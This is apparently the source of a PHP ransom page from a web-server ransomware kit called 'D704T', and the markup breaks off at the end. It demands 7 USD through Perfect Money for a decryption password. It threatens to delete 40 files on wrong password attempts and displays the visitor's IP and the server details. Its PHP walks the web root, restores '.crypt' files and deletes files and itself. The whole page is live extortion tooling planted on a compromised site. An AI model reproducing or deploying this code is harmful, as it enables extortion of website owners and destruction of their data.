rans

<title>D704T RANSOMWARE</title>
<link rel="shortcut icon" type="image/x-icon" href="https://cdn.pixabay.com/photo/2012/04/12/13/12/devil-29973_960_720.png">
<meta property="og:image" content="https://frsecure.com/wp-content/uploads/2019/08/why-you-shouldnt-pay-ransomware-attackers.png">
<style>
html {
background: black;
color: white;
}
input { background: transparent; color: white; border: 1px solid white; }
</style>
<?php
error_reporting(0);
$input = $_POST['pass'];
$pass = "jancokjaran";
if(isset($input)) {
if(md5($input) == $pass) {
function decfile($filename){
	if (strpos($filename, '.crypt') === FALSE) {
	return;
	}
	$decrypted = gzinflate(file_get_contents($filename));
	file_put_contents(str_replace('.crypt', '', $filename), $decrypted);
	unlink('crypt.php');
	unlink('.htaccess');
	unlink($filename);
	echo "$filename Decrypted !!!<br>";
}

function decdir($dir){
	$files = array_diff(scandir($dir), array('.', '..'));
		foreach($files as $file) {
			if(is_dir($dir."/".$file)){
				decdir($dir."/".$file);
			}else {
				decfile($dir."/".$file);
		}
	}
}

decdir($_SERVER['DOCUMENT_ROOT']);
echo "<br>Webroot Decrypted<br>";
unlink($_SERVER['PHP_SELF']);
unlink('.htaccess');
copy('htabackup','.htaccess');
echo 'Success !!!';
} else {
echo 'The more you force the login with the wrong password, the 40 files you will be deleted.!!!<br>I dont like anyone like you, if possible why not contact me via the email listed below ?? Are you drunk or what ?? Do you want to be banned on the website ??<br>Within 3 minutes 40 of your files will be randomly deleted <br> If you dont know the dangers of ransomware, read the article here >>>https://en.wikipedia.org/wiki/Ransomware<<< <br>You can contact 2 emails <br> ========================== <br> - [email protected] <br> - [email protected]<center><br>
Many people are victims like you, but they think to save the data contained in the web just by paying 7USD without hesitation, because of what ?? everyone if told there is no response at all in reporting bugs on the website<br>
I do this just to give a warning to those who always underestimate the slightest bug reported by me, if it is not appreciated at all then this is what happens and enjoy a feeling that is not so pleasant in your mind. And I am asking for payment for helping me with the shortcomings of people I find on the streets<br><h1>
Charity is fun and wont hurt you</h1>';
}
exit();
}
?>
<center>
<h2>ENCRYPTTED BY #! /D704T/RANSOMWARE/</h2>
<img height="250" width="300" src="https://i.imgur.com/lcc1uDj.gif"/>
<br><br>
<h4>#! /YOUR/FILE/IS/MY/MONEY/<br>$1$gqCR1MmD$vcygqQQ6E2VLEj6rOxlPb/</h4>


Don't Change the Filename because it Can Damage the File If You Want to Return You Must Enter the Password First
<br>
To recover all files send 7$ for the recovery password. Payment can be through Perfect Money <br>
Perfect Money ID : <input type="text" value="kontolanjing" readonly>
<br><br>
<form enctype="multipart/form-data" method="post">
<input type="text" name="pass" placeholder="Password"> <input type="submit" value="Decrypt">
</form>
<br>Contact Mail : [email protected]<br>
<?php
    if(!empty($_SERVER['HTTP_CLIENT_IP'])){
      $ip=$_SERVER['HTTP_CLIENT_IP'];
    }
    elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){
      $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else{
      $ip=$_SERVER['REMOTE_ADDR'];
    }
 $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
?>
<?php echo $_SERVER['REMOTE_ADDR']; ?> -
<?php echo $_SERVER['SERVER_NAME']; ?> -
<?php echo "Web Srever : ".$_SERVER['SERVER_SOFTWARE']; ?>
<br>
<button onclick="playPause()" style="border:1px solid black;">Play music</button><button onclick="playPause()" style="border:1px solid black;">Pause music</button>
	<br>
	<audio id="p" width="460">
	  <source src="https://all2door.com/music/ransomhehe.mp3" type="audio/mp3">
	</audio>
<script>
var myMusic = document.getElementById("p");

function playPause() {
    if (myMusic.paused)
        myMusic.play();
    else
        myMusic.pause();
}
</script>
<br>
	<table width="100%" height="30%">